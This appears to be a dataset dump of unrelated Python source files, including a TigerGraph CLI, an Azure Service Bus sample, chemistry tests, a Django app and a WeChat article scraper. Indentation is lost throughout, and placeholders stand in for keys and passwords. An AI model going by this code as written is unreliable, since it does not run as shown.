if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: python3 create-json-objects.py #num_objects #output_path")
else:
main(*sys.argv[1:]) | StarcoderdataPython |
9684664 | # Example: Hangup call
api.hangup_call('callId')
| StarcoderdataPython |
1931172 | #!/usr/bin/env python
# Copyright Contributors to the Open Shading Language project.
# SPDX-License-Identifier: BSD-3-Clause
# https://github.com/AcademySoftwareFoundation/OpenShadingLanguage
# max(float,float) includes masking
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_float_u_float.tif test_max_u_float_u_float")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_float_v_float.tif test_max_u_float_v_float")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_float_u_float.tif test_max_v_float_u_float")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_float_v_float.tif test_max_v_float_v_float")
# Derivs includes masking
command += testshade("--vary_udxdy --vary_udxdy -t 1 -g 64 64 -od uint8 -o Cout out_max_v_dfloat_v_dfloat.tif test_max_v_dfloat_v_dfloat")
# max(int, int) (includes masking)
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_int_u_int.tif test_max_u_int_u_int")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_int_v_int.tif test_max_u_int_v_int")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_int_u_int.tif test_max_v_int_u_int")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_int_v_int.tif test_max_v_int_v_int")
# max(vec, vec) (including Masking)
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_vec_u_vec.tif test_max_u_vec_u_vec")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_u_vec_v_vec.tif test_max_u_vec_v_vec")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_vec_v_vec.tif test_max_v_vec_v_vec")
command += testshade("-t 1 -g 64 64 -od uint8 -o Cout out_max_v_vec_u_vec.tif test_max_v_vec_u_vec")
# Derivs includes masking
command += testshade("--vary_udxdy --vary_udxdy -t 1 -g 64 64 -od uint8 -o Cout out_max_v_dvec_v_dvec.tif test_max_v_dvec_v_dvec")
outputs = [
"out_max_u_float_u_float.tif",
"out_max_u_float_v_float.tif",
"out_max_v_float_u_float.tif",
"out_max_v_float_v_float.tif",
"out_max_v_dfloat_v_dfloat.tif",
"out_max_u_int_u_int.tif",
"out_max_u_int_v_int.tif",
"out_max_v_int_u_int.tif",
"out_max_v_int_v_int.tif",
"out_max_u_vec_u_vec.tif",
"out_max_u_vec_v_vec.tif",
"out_max_v_vec_v_vec.tif",
"out_max_v_vec_u_vec.tif",
"out_max_v_dvec_v_dvec.tif"
]
# expect a few LSB failures
failthresh = 0.008
failpercent = 3
| StarcoderdataPython |
48761 | <gh_stars>1-10
from typing import List
import typer
from tgcli.commands.etc.help_text import GRAPH_ARG_HELP, CONFIG_ARG_HELP
from tgcli.commands.util import get_initialized_tg_connection, resolve_multiple_args, preprocess_list_query
from tgcli.util import cli
get_app = typer.Typer(help="Get resources from your TigerGraph server.")
@get_app.command("vertices")
def get_vertices(
# Basic config
config_name: str = typer.Argument(None, help=CONFIG_ARG_HELP),
graph_name: str = typer.Argument(None, help=GRAPH_ARG_HELP),
# Required items
vertex_type: str = typer.Option(..., "--type", help="Type of the vertex."),
# Query by ID's. If given, ID's take precedence over the generic query
vertex_ids: List[str] = typer.Option(
[], "--id",
help="ID of the vertex to retrieve, multiple can be specified by using the flag multiple times. If "
"this is specified, other query parameters are ignored."
),
# Generic query params
attributes: List[str] = typer.Option(
[], '--attr',
help="Attributes to return for each vertex, multiple can be specified by using the flag multiple times. "
"See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#select ."
),
where: List[str] = typer.Option(
[], '--where',
help="A condition to match for returned vertices, "
"multiple can be specified by using the flag multiple times. "
"Multiple conditions are joined with AND. "
"See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#filter . "
"For string conditions, the literal can be escaped like so: '--where=gender=\\\"male\\\"'. "
"Alternatively, string escapes can be replaced by the URL-encoded string '%22'."
),
sort_by_attrs: List[str] = typer.Option(
[], '--sort',
help="Attribute name to sort results by, multiple can be specified by using the flag multiple times. "
"See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#sort."
),
limit: int = typer.Option(10, '--limit', help="Maximum number of results to retrieve."),
timeout: int = typer.Option(60, '--timeout', help="Timeout in seconds.")
):
"""Get a set of vertices, either by ID or by query"""
conn = get_initialized_tg_connection(config_name=config_name, graph_name=graph_name, require_graph=True)
if vertex_ids:
# Given ID's give precedence
output = conn.getVerticesById(vertex_type, resolve_multiple_args(vertex_ids))
else:
output = conn.getVertices(
vertex_type,
select=preprocess_list_query(attributes),
where=preprocess_list_query(where),
sort=preprocess_list_query(sort_by_attrs),
limit=limit,
timeout=timeout
)
cli.print_to_console(output)
@get_app.command("edges")
def get_edges(
# Basic config
config_name: str = typer.Argument(None, help=CONFIG_ARG_HELP),
graph_name: str = typer.Argument(None, help=GRAPH_ARG_HELP),
# Required items
source_vertex_type: str = typer.Option(..., "--from-type", help="Type of the source vertex."),
source_vertex_id: str = typer.Option(..., "--from-id", help="ID of the source vertex."),
# Filter by target
target_vertex_id: str = typer.Option(None, "--to-id", help="ID of the target vertex"),
target_vertex_type: str = typer.Option(
None, "--to-type", help="Type of the target vertex. Required if '--to-id' is specified."
),
edge_type: str = typer.Option(
None, "--edge-type", help="Type of the edge. Required if '--to-id' and '--to-type' are specified."
),
# Generic query params
attributes: List[str] = typer.Option(
[], '--attr',
help="Attributes to return for each edge, multiple can be specified by using the flag multiple times. "
"See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#select."
),
where: List[str] = typer.Option(
[], '--where',
help="A condition to match for returned edges, "
"multiple can be specified by using the flag multiple times. "
"Multiple conditions are joined with AND. "
"See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#filter. "
"For string conditions, the literal can be escaped like so: '--where=gender=\\\"male\\\"'. "
"Alternatively, string escapes can be replaced by the URL-encoded string '%22'."
),
sort_by_attrs: List[str] = typer.Option(
[], '--sort',
help="Attribute name to sort results by, multiple can be specified by using the flag multiple times. "
"See https://docs.tigergraph.com/dev/restpp-api/built-in-endpoints#sort."
),
limit: int = typer.Option(10, '--limit', help="Maximum number of results to retrieve."),
timeout: int = typer.Option(60, '--timeout', help="Timeout in seconds.")
):
"""Get a set of edges"""
conn = get_initialized_tg_connection(config_name=config_name, graph_name=graph_name, require_graph=True)
if target_vertex_id and (not target_vertex_type or not edge_type):
cli.terminate(message="Target vertex ID is specified but target vertex type or edge type isn't.", is_err=True)
output = conn.getEdges(
sourceVertexType=source_vertex_type,
sourceVertexId=source_vertex_id,
targetVertexType=target_vertex_type,
targetVertexId=target_vertex_id,
edgeType=edge_type,
select=preprocess_list_query(attributes),
where=preprocess_list_query(where),
sort=preprocess_list_query(sort_by_attrs),
limit=limit,
timeout=timeout
)
cli.print_to_console(output)
@get_app.command("types")
def get_type_info(
# Basic config
config_name: str = typer.Argument(None, help=CONFIG_ARG_HELP),
graph_name: str = typer.Argument(None, help=GRAPH_ARG_HELP),
# Types to query
vertex_type_names: List[str] = typer.Option(
[], "--vertex", help="Vertex type name to query. Specify * to query all."
),
edge_type_names: List[str] = typer.Option(
[], "--edge", help="Vertex type name to query. Specify * to query all."
)
):
"""Get a set of types, either vertices or edges. If no optioans are given, all types are returned."""
conn = get_initialized_tg_connection(config_name=config_name, graph_name=graph_name, require_graph=True)
results = {}
query_all = (not vertex_type_names) and (not edge_type_names)
if vertex_type_names or query_all:
vertex_types = resolve_multiple_args(vertex_type_names)
if query_all:
vertex_types = "*"
results.update(conn.getVertexStats(vertex_types))
if edge_type_names or query_all:
edge_types = resolve_multiple_args(edge_type_names)
if query_all:
edge_types = "*"
results.update(conn.getEdgeStats(edge_types))
cli.print_to_console(results)
@get_app.command("schema")
def get_schema(config_name: str, graph_name: str):
"""Retrieve the schema for the configuration"""
conn = get_initialized_tg_connection(config_name=config_name, graph_name=graph_name)
output = conn.getSchema()
cli.print_to_console(output)
| StarcoderdataPython |
1699342 | <reponame>tadams42/seveno_pyutil<filename>tests/benchmarking_utilities_spec.py
import time
from seveno_pyutil import Stopwatch
class DescribeStopwatch(object):
def it_provides_context_manager_for_duration_measurement(self):
with Stopwatch() as stopwatch:
time.sleep(1)
assert stopwatch.duration_ms >= 1000
| StarcoderdataPython |
54045 | #!/usr/bin/env python
"""Test functions in openmoltools.schrodinger."""
import unittest
from openmoltools.schrodinger import *
@unittest.skipIf(not is_schrodinger_suite_installed(), "This test requires Schrodinger's suite")
def test_structconvert():
"""Test run_structconvert() function."""
benzene_path = utils.get_data_filename("chemicals/benzene/benzene.pdb")
def collect_lines(pdb_path):
"""Collect all HETATM and CONNECT lines in the pdb."""
all_lines = []
with open(pdb_path, 'r') as f:
for line in f:
field = line[:6]
n_atom = line[10:11]
if n_atom == '4' or n_atom == '9':
continue # Discard atoms 4 and 9 which have a -0.000
if field == 'HETATM' or field == 'CONECT':
all_lines.append(line.strip())
return all_lines
with mdtraj.utils.enter_temp_directory():
# Convert from pdb to mol2 and back
run_structconvert(benzene_path, 'benzene.mol2')
run_structconvert('benzene.mol2', 'benzene.pdb')
new_lines = collect_lines('benzene.pdb')
# The new pdb should be equal to the old one
original_lines = collect_lines(benzene_path)
assert original_lines == new_lines
@unittest.skipIf(not is_schrodinger_suite_installed(), "This test requires Schrodinger's suite")
def test_proplister():
"""Test run_proplister() function."""
benzene_path = utils.get_data_filename("chemicals/benzene/benzene.sdf")
properties = run_proplister(benzene_path)
assert len(properties) == 1
assert len(properties[0]) == 23
# Test subset of properties
expected = {'i_sd_PUBCHEM_COMPOUND_CID': '241',
'r_sd_PUBCHEM_CONFORMER_RMSD': '0.4',
'i_sd_PUBCHEM_CONFORMER_DIVERSEORDER': '1',
's_sd_PUBCHEM_MMFF94_PARTIAL_CHARGES': ('12\n1 -0.15\n10 0.15\n11 0.15\n'
'12 0.15\n2 -0.15\n3 -0.15\n4 -0.15\n'
'5 -0.15\n6 -0.15\n7 0.15\n8 0.15\n'
'9 0.15')
}
assert set(expected.items()) < set(properties[0].items())
@unittest.skipIf(not is_schrodinger_suite_installed(), "This test requires Schrodinger's suite")
def test_epik_maesubset_autoconvert():
"""Test run_epik and run_maesubset functions and autoconvert_maestro decorator."""
imatinib_path = utils.get_data_filename("chemicals/imatinib/imatinib.sdf")
with mdtraj.utils.enter_temp_directory():
run_structconvert(imatinib_path, 'imatinib.mae')
run_epik('imatinib.mae', 'imatinib-epik.mae', ph=7.0)
run_maesubset('imatinib-epik.mae', 'imatinib02.mae', range=[0, 2])
run_structconvert('imatinib02.mae', 'imatinib02.sdf')
# The 4 lines above should be equivalent to
run_epik(imatinib_path, 'imatinib-auto02.sdf', ph=7.0, tautomerize=True,
extract_range=[0, 2])
# Check that results contain indeed 2 molecules
assert len(run_proplister('imatinib02.sdf')) == 2 # 2 molecules
assert len(run_proplister('imatinib-auto02.sdf')) == 2
# Check that results are identical
with open('imatinib02.sdf', 'r') as f:
lines = f.readlines()
with open('imatinib-auto02.sdf', 'r') as f:
assert f.readlines() == lines
| StarcoderdataPython |
3544857 | <reponame>vincenttran-msft/azure-sdk-for-python
#!/usr/bin/env python
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
"""
An (overly) verbose sample demonstrating possible failure modes and potential recovery patterns.
Many of these catches are present for illustrative or duplicate purposes, and could be condensed or elided
in a production scenario depending on the system design.
"""
import os
from azure.servicebus import ServiceBusClient, ServiceBusMessage
from azure.servicebus.exceptions import (
MessageSizeExceededError,
ServiceBusConnectionError,
ServiceBusAuthorizationError,
ServiceBusAuthenticationError,
OperationTimeoutError,
ServiceBusError,
ServiceBusCommunicationError,
MessageAlreadySettled,
MessageLockLostError,
MessageNotFoundError
)
CONNECTION_STR = os.environ['SERVICE_BUS_CONNECTION_STR']
QUEUE_NAME = os.environ["SERVICE_BUS_QUEUE_NAME"]
def send_batch_messages(sender):
batch_message = sender.create_message_batch()
for i in range(10):
try:
message = ServiceBusMessage("Data {}".format(i))
except TypeError:
# Message body is of an inappropriate type, must be string, bytes or None.
continue
try:
batch_message.add_message(message)
except MessageSizeExceededError:
# ServiceBusMessageBatch object reaches max_size.
# New ServiceBusMessageBatch object can be created here to send more data.
# This must be handled at the application layer, by breaking up or condensing.
continue
last_error = None
for _ in range(3): # Send retries
try:
sender.send_messages(batch_message)
return
except OperationTimeoutError:
# send has timed out, retry.
continue
except MessageSizeExceededError:
# The body provided in the message to be sent is too large.
# This must be handled at the application layer, by breaking up or condensing.
raise
except ServiceBusError as e:
# Other types of service bus errors that can be handled at the higher level, such as connection/auth errors
# If it happens persistently, should bubble up, and should be logged/alerted if high volume.
last_error = e
continue
if last_error:
raise last_error
def receive_messages(receiver):
should_retry = True
while should_retry:
try:
for msg in receiver:
try:
# Do your application-specific data processing here
print(str(msg))
should_complete = True
except Exception as e:
should_complete = False
for _ in range(3): # Settlement retry
try:
if should_complete:
receiver.complete_message(msg)
else:
receiver.abandon_message(msg)
# Depending on the desired behavior, one could dead letter on failure instead; failure modes are comparable.
# Abandon returns the message to the queue for another consumer to receive, dead letter moves to the dead letter subqueue.
#
# receiver.dead_letter_message(msg, reason=str(e), error_description="Application level failure")
break
except MessageAlreadySettled:
# Message was already settled, either somewhere earlier in this processing or by another node. Continue.
break
except MessageLockLostError:
# Message lock was lost before settlement. Handle as necessary in the app layer for idempotency then continue on.
break
except MessageNotFoundError:
# Message has an improper sequence number, was dead lettered, or otherwise does not exist. Handle at app layer, continue on.
break
except ServiceBusError:
# Any other undefined service errors during settlement. Can be transient, and can retry, but should be logged, and alerted on high volume.
continue
return
except ServiceBusAuthorizationError:
# Permission based errors should be bubbled up.
raise
except:
# Although miscellaneous service errors and interruptions can occasionally occur during receiving,
# In most pragmatic cases one can try to continue receiving unless the failure mode seens persistent.
# Logging the associated failure and alerting on high volume is often prudent.
continue
def send_and_receive_defensively():
servicebus_client = ServiceBusClient.from_connection_string(conn_str=CONNECTION_STR, logging_enable=True)
for _ in range(3): # Connection retries.
try:
print("Opening")
with servicebus_client:
sender = servicebus_client.get_queue_sender(queue_name=QUEUE_NAME)
try:
with sender:
print("Sending")
send_batch_messages(sender)
except ValueError:
# Handler was shut down previously. (Cannot happen in this example, shown for completeness.)
pass
receiver = servicebus_client.get_queue_receiver(queue_name=QUEUE_NAME)
try:
with receiver:
print("Receiving")
receive_messages(receiver)
except ValueError:
# Handler was shut down previously. (Cannot happen in this example, shown for completeness.)
pass
return
except ServiceBusConnectionError:
# An error occurred in the connection to the service.
# This may have been caused by a transient network issue or service problem. It is recommended to retry.
continue
except ServiceBusAuthorizationError:
# An error occurred when authorizing the connection to the service.
# This may have been caused by the credentials not having the right permission to perform the operation.
# It is recommended to check the permission of the credentials.
raise
except ServiceBusAuthenticationError:
# An error occurred when authenticate the connection to the service.
# This may have been caused by the credentials being incorrect. It is recommended to check the credentials.
raise
except ServiceBusCommunicationError:
# Unable to communicate with the specified servicebus. Ensure that the FQDN is correct,
# and that there is no firewall or network issue preventing connectivity.
raise
send_and_receive_defensively()
print("Send and Receive is done.")
| StarcoderdataPython |
8000050 | from pyrogram.types import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InputMediaDocument,
InputMediaVideo,
InputMediaAudio,
Message,
)
from Yukki import app
from pyrogram import Client, filters
from youtubesearchpython import VideosSearch
import lyricsgenius
import re
@Client.on_callback_query(filters.regex(pattern=r"lyrics"))
async def lyricssex(_,CallbackQuery):
callback_data = CallbackQuery.data.strip()
callback_request = callback_data.split(None, 1)[1]
try:
id, user_id = callback_request.split("|")
except Exception as e:
return await CallbackQuery.message.edit(f"Error Occured\n**Possible reason could be**:{e}")
url = (f"https://www.youtube.com/watch?v={id}")
print(url)
try:
results = VideosSearch(url, limit=1)
for result in results.result()["result"]:
title = (result["title"])
except Exception as e:
return await CallbackQuery.answer("Sound not found. Youtube issues.", show_alert=True)
x = "<KEY>"
y = lyricsgenius.Genius(x)
print(title)
t = re.sub(r'[^\w]', ' ', title)
print(t)
y.verbose = False
S = y.search_song(t, get_full_info=False)
if S is None:
return await CallbackQuery.answer("Lyrics not found :p", show_alert=True)
await CallbackQuery.message.delete()
userid = CallbackQuery.from_user.id
usr = f"[{CallbackQuery.from_user.first_name}](tg://user?id={userid})"
xxx = f"""
**Lyrics Search Powered By R<NAME>**
**Searched By:-** {usr}
**Searched Song:-** __{title}__
**Found Lyrics For:-** __{S.title}__
**Artist:-** {S.artist}
**__Lyrics:__**
{S.lyrics}"""
await CallbackQuery.message.reply_text(xxx)
@Client.on_message(filters.command("lyrics"))
async def lrsearch(_, message: Message):
m = await message.reply_text("Searching Lyrics")
query = message.text.split(None, 1)[1]
x = "<KEY>"
y = lyricsgenius.Genius(x)
y.verbose = False
S = y.search_song(query, get_full_info=False)
if S is None:
return await m.edit("Lyrics not found :p")
xxx = f"""
**Lyrics Search Powered By MUNNA X MUSIC Bot**
**Searched Song:-** __{query}__
**Found Lyrics For:-** __{S.title}__
**Artist:-** {S.artist}
**__Lyrics:__**
{S.lyrics}"""
await m.edit(xxx)
| StarcoderdataPython |
5100199 | <filename>4.29/world_population.py<gh_stars>0
import json
import pygal.maps.world
from country_codes import get_country_code
#将数据加载到一个列表中
filename='population_data.json'
with open(filename) as f:
pop_data=json.load(f)
#创建一个包含人口数量的字典
cc_populations={}
for pop_dict in pop_data:
if pop_dict['Year']=='2010':
country=pop_dict['Country Name']
population=int(float(pop_dict['Value']))
code=get_country_code(country)
if code:
cc_populations[code]=population
wm=pygal.maps.world.World()
wm.title='World Population in 2010,by Country'
wm.add('2010',cc_populations)
wm.render_to_file('world_population.svg')
| StarcoderdataPython |
12852350 | #!/usr/bin/env python
"""
"""
from xml.etree.ElementTree import Element
import xml.etree.ElementTree as etree
import xml.dom.minidom
import re
import sys
import getopt
import os
from time import gmtime, strftime
from nipype import config, logging
from nighres.lesion_tool.lesion_pipeline import Lesion_extractor
def main():
try:
o, a = getopt.getopt(sys.argv[1:], "n:d:s:f:a:l:")
except getopt.GetoptError as err:
print(err)
print('waimea.py -n <directory> -d <base_directory> -s <subject> -f <freesurfer dir> -a <atlas> -l <labels>')
sys.exit(2)
if len(o) < 4:
print('waimea.py -n <directory> -d <base_directory> -s <subject> -f <freesurfer dir> -a <atlas> -l <labels>')
sys.exit(2)
for opt, arg in o:
if opt == '-n':
wf_name = arg
elif opt == '-d':
base_dir = arg
elif opt == '-s':
sub = arg
elif opt == '-f':
fsdir = arg
elif opt == '-a':
atlas = arg
elif opt == '-l':
labels = arg
wf = Lesion_extractor(wf_name=wf_name,
base_dir=base_dir,
subjects=[sub],
#main=main,
#acc=acc,
atlas=atlas,
fs_subjects_dir=fsdir,
labels=labels)
config.update_config({'logging': {'log_directory': wf.base_dir,'log_to_file': True}})
logging.update_logging(config)
config.set('execution','job_finished_timeout','20.0')
wf.config['execution'] = {'job_finished_timeout': '10.0'}
try:
wf.run()
except:
print('Error! Pipeline exited ')
raise
if __name__ == "__main__":
main()
| StarcoderdataPython |
8017886 | <reponame>oracle-devrel/leagueoflegends-optimizer
# Copyright (c) 2021 Oracle and/or its affiliates.
import yaml
import cx_Oracle
import os
from pathlib import Path
home = str(Path.home())
def load_config_file():
with open('../config.yaml') as file:
return yaml.safe_load(file)
# wallet location (default is HOME/wallets/wallet_X)
os.environ['TNS_ADMIN'] = '{}/{}'.format(home, load_config_file()['WALLET_DIR'])
print(os.environ['TNS_ADMIN'])
def init_db_connection(data):
connection = cx_Oracle.connect(data['db']['username'], data['db']['password'], data['db']['dsn'])
print('Connection successful.')
connection.autocommit = True
return connection
def process_1v1_model(connection):
# Now, set a processed_1v1 bit in the match
collection_matchups = connection.getSodaDatabase().createCollection('matchups')
collection_1v1_model = connection.getSodaDatabase().createCollection('1v1_model')
matchup_documents = collection_matchups.find().getDocuments()
for x in matchup_documents:
#shuffled_list = random.shuffle(matchup_documents)
match_id = x.getContent().get('p_match_id')
data = x.getContent().get('data')
champion_matchup = list()
win_matchup = list()
for y in data:
champion_matchup.append(y.get('champion'))
win_matchup.append(y.get('win'))
win_var = int()
if win_matchup[0] is True:
win_var = 1
else:
win_var = 0
obj = {
'match_id':match_id,
'champ1':champion_matchup[0],
'champ2':champion_matchup[1],
'win': win_var
}
print(obj)
try:
collection_1v1_model.insertOne(obj)
except cx_Oracle.IntegrityError:
continue
print('Inserted {}'.format(obj))
def main():
data = load_config_file()
connection = init_db_connection(data)
process_1v1_model(connection)
connection.close()
if __name__ == '__main__':
main() | StarcoderdataPython |
1734393 | <filename>elections/admin.py<gh_stars>1-10
from django.contrib import admin
from django.utils.html import format_html
from reversion.admin import VersionAdmin
from elections.models import Election, ElectionResult, PresidentCandidate, PresidentCandidateBiography, \
PresidentCandidatePoliticalExperience, PresidentCandidateWorkExperience, PresidentCandidateArticle, \
PresidentCandidateArticleInformation, MayorCandidate, Moderators, Debates, EuroParliamentCandidate, \
EuroParliamentCandidatePoliticalExperience, EuroParliamentCandidateWorkExperience, EuroParliamentCandidateEducation, \
EuroParliamentCandidateConviction, SeimasCandidate
from django.utils.translation import gettext_lazy as _
@admin.register(Election)
class ElectionAdmin(VersionAdmin):
search_fields = ['name', 'election_id']
list_display = ['name', 'is_active', 'slug', 'election_id', 'election_date', 'last_results_update', 'vr_id',
'vr_id', 'rt_no']
@admin.register(ElectionResult)
class ElectionAdmin(VersionAdmin):
search_fields = ['name']
list_select_related = ['election']
list_filter = ['election']
list_display = ['name', 'party', 'photo', 'election', 'candidate_id', 'postal_votes', 'ballot_votes',
'percent_ballot_paper', 'percent_voters', 'created_at', 'updated_at']
class PresidentCandidateArticleInline(admin.StackedInline):
model = PresidentCandidateArticle
class PresidentCandidateArticleInformationInline(admin.StackedInline):
model = PresidentCandidateArticleInformation
class PresidentCandidateBiographyInline(admin.StackedInline):
model = PresidentCandidateBiography
class PresidentCandidatePoliticalExperienceInline(admin.StackedInline):
model = PresidentCandidatePoliticalExperience
class PresidentCandidateWorkExperienceInline(admin.StackedInline):
model = PresidentCandidateWorkExperience
@admin.register(PresidentCandidate)
class PresidentCandidateAdmin(VersionAdmin):
inlines = [PresidentCandidatePoliticalExperienceInline, PresidentCandidateWorkExperienceInline]
search_fields = ['name']
list_display = ['name', 'photo', 'is_active', 'candidate_program_title', 'candidate_program_summary',
'candidate_program_link', 'created_at', 'updated_at']
exclude = ['slug']
view_on_site = True
@admin.register(SeimasCandidate)
class SeimasCandidateAdmin(VersionAdmin):
search_fields = ['name']
list_display = ['name', 'photo', 'is_active', 'email', 'party', 'district', 'created_at', 'updated_at']
view_on_site = True
@admin.register(MayorCandidate)
class MayorCandidateAdmin(admin.ModelAdmin):
search_fields = ['first_name', 'last_name', ]
list_display = ['first_name', 'last_name', 'email', 'is_active', 'party', 'municipality', 'created_at',
'updated_at']
list_filter = ['is_active', 'municipality', 'party']
exclude = ['slug']
view_on_site = True
class EuroParliamentCandidatePoliticalExperienceInline(admin.StackedInline):
model = EuroParliamentCandidatePoliticalExperience
class EuroParliamentCandidateWorkExperienceInline(admin.StackedInline):
model = EuroParliamentCandidateWorkExperience
class EuroParliamentCandidateEducationInline(admin.StackedInline):
model = EuroParliamentCandidateEducation
class EuroParliamentCandidateConvictionInline(admin.StackedInline):
model = EuroParliamentCandidateConviction
@admin.register(EuroParliamentCandidate)
class MepCandidateAdmin(admin.ModelAdmin):
inlines = [EuroParliamentCandidatePoliticalExperienceInline, EuroParliamentCandidateWorkExperienceInline,
EuroParliamentCandidateEducationInline, EuroParliamentCandidateConvictionInline]
search_fields = ['first_name', 'last_name']
list_display = ['first_name', 'last_name', 'is_active', 'party', 'created_at', 'updated_at']
list_filters = ['is_active', 'party']
exclude = ['slug']
view_on_site = True
@admin.register(PresidentCandidateArticle)
class PresidentCandidateArticleAdmin(VersionAdmin):
search_fields = ['candidate__name', 'url']
list_display = ['candidate', 'article_url', 'created_at']
list_select_related = ['candidate']
list_filter = ['candidate__name', ]
inlines = [PresidentCandidateArticleInformationInline]
def article_url(self, obj):
return format_html('<a href="{url}" target="_blank">{url}</a>', url=obj.url)
article_url.short_description = _("Naujienos nuoroda")
@admin.register(Moderators)
class ModeratorsAdmin(VersionAdmin):
search_fields = ['first_name', 'last_name']
list_display = ['name', 'photo']
exclude = ['slug']
def deactivate_debates(ModelAdmin, request, queryset):
for debate in queryset:
if debate.is_active == True:
debate.is_active = False
debate.save()
deactivate_debates.short_description = "Išjungti pasirinktus debatus"
@admin.register(Debates)
class DebatesAdmin(VersionAdmin):
search_fields = ['name']
list_display = ['election_type', 'name', 'tour_id', 'location', 'municipality', 'date', 'time', 'moderator',
'is_active',
'created_at', 'updated_at']
list_filter = ['municipality', 'moderator', 'is_active', 'tour_id', 'election_type']
exclude = ['slug']
list_select_related = ['municipality', 'moderator']
autocomplete_fields = ['municipality', 'moderator']
actions = [deactivate_debates]
| StarcoderdataPython |
1763392 | <filename>core/views.py
from django.contrib.auth import login, authenticate
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.forms.models import inlineformset_factory
from django.shortcuts import render, redirect
from .forms import ProfileForm, SignUpForm
from .models import UserProfile
@login_required
def dashboard(request):
try:
usuario = UserProfile.objects.get(user=request.user)
except UserProfile.DoesNotExist:
usuario = None
return render(request, 'dashboard.html', {'usuario': usuario, })
@login_required
def profile(request):
try:
usuario = UserProfile.objects.get(user=request.user)
except UserProfile.DoesNotExist:
usuario = None
return render(request, 'profile.html', {'usuario': usuario})
@login_required
def profile_update(request):
try:
usuario = UserProfile.objects.get(user=request.user)
except UserProfile.DoesNotExist:
usuario = None
ProfileInlineFormset = inlineformset_factory(User, UserProfile, fields=('avatar',))
formset = ProfileInlineFormset(instance=request.user)
if request.method == 'POST':
form = ProfileForm(data=request.POST, instance=request.user)
formset = ProfileInlineFormset(request.POST, request.FILES, instance=request.user)
if form.is_valid():
perfil = form.save(commit=False)
formset = ProfileInlineFormset(request.POST, request.FILES, instance=perfil)
if formset.is_valid():
perfil.save()
formset.save()
# return HttpResponseRedirect('/accounts/profile/')
return redirect('dashboard')
else:
form = ProfileForm(instance=request.user)
formset = ProfileInlineFormset(instance=request.user)
return render(request, 'profile_update.html', {'form': form,
'formset': formset,
'usuario': usuario, })
def signup(request):
if request.method == 'POST':
form = SignUpForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=username, password=<PASSWORD>)
login(request, user)
return redirect('dashboard')
else:
form = SignUpForm()
return render(request, 'registration/signup.html', {'form': form})
| StarcoderdataPython |
12851838 | <reponame>GingerWWW/news_spider<filename>tools/weixin.py
#!/usr/bin/env python
# encoding: utf-8
"""
@author: zhanghe
@software: PyCharm
@file: weixin.py
@time: 2018-02-10 17:55
"""
import re
import time
import hashlib
# from urlparse import urljoin # PY2
# from urllib.parse import urljoin # PY3
from future.moves.urllib.parse import urljoin
import execjs
from tools.char import un_escape
from config import current_config
from models.news import FetchResult
from news.items import FetchResultItem
from apps.client_db import db_session_mysql
from maps.platform import WEIXIN, WEIBO
BASE_DIR = current_config.BASE_DIR
def get_finger(content_str):
"""
:param content_str:
:return:
"""
m = hashlib.md5()
m.update(content_str.encode('utf-8') if isinstance(content_str, unicode) else content_str)
finger = m.hexdigest()
return finger
def parse_weixin_js_body(html_body, url=''):
"""
解析js
:param html_body:
:param url:
:return:
"""
rule = r'<script type="text/javascript">.*?(var msgList.*?)seajs.use\("sougou/profile.js"\);.*?</script>'
js_list = re.compile(rule, re.S).findall(html_body)
if not js_list:
print('parse error url: %s' % url)
return ''.join(js_list)
def parse_weixin_article_id(html_body):
rule = r'<script nonce="(\d+)" type="text\/javascript">'
article_id_list = re.compile(rule, re.I).findall(html_body)
return article_id_list[0]
def add_img_src(html_body):
rule = r'data-src="(.*?)"'
img_data_src_list = re.compile(rule, re.I).findall(html_body)
print(img_data_src_list)
for img_src in img_data_src_list:
print(img_src)
html_body = html_body.replace(img_src, '%(img_src)s" src="%(img_src)s' % {'img_src': img_src})
return html_body
def get_img_src_list(html_body, host_name='/', limit=None):
rule = r'src="(%s.*?)"' % host_name
img_data_src_list = re.compile(rule, re.I).findall(html_body)
if limit:
return img_data_src_list[:limit]
return img_data_src_list
def check_article_title_duplicate(article_title):
"""
检查标题重复
:param article_title:
:return:
"""
session = db_session_mysql()
article_id_count = session.query(FetchResult) \
.filter(FetchResult.platform_id == WEIXIN,
FetchResult.article_id == get_finger(article_title)) \
.count()
return article_id_count
class ParseJsWc(object):
"""
解析微信动态数据
"""
def __init__(self, js_body):
self.js_body = js_body
self._add_js_msg_list_fn()
self.ctx = execjs.compile(self.js_body)
# print(self.ctx)
def _add_js_msg_list_fn(self):
js_msg_list_fn = """
function r_msg_list() {
return msgList.list;
};
"""
self.js_body += js_msg_list_fn
def parse_js_msg_list(self):
msg_list = self.ctx.call('r_msg_list')
app_msg_ext_info_list = [i['app_msg_ext_info'] for i in msg_list]
comm_msg_info_date_time_list = [time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(i['comm_msg_info']['datetime'])) for i in msg_list]
# msg_id_list = [i['comm_msg_info']['id'] for i in msg_list]
msg_data_list = [
{
# 'article_id': '%s_000' % msg_id_list[index],
'article_id': get_finger(i['title']),
'article_url': urljoin('https://mp.weixin.qq.com', un_escape(i['content_url'])),
'article_title': i['title'],
'article_abstract': i['digest'],
'article_pub_time': comm_msg_info_date_time_list[index],
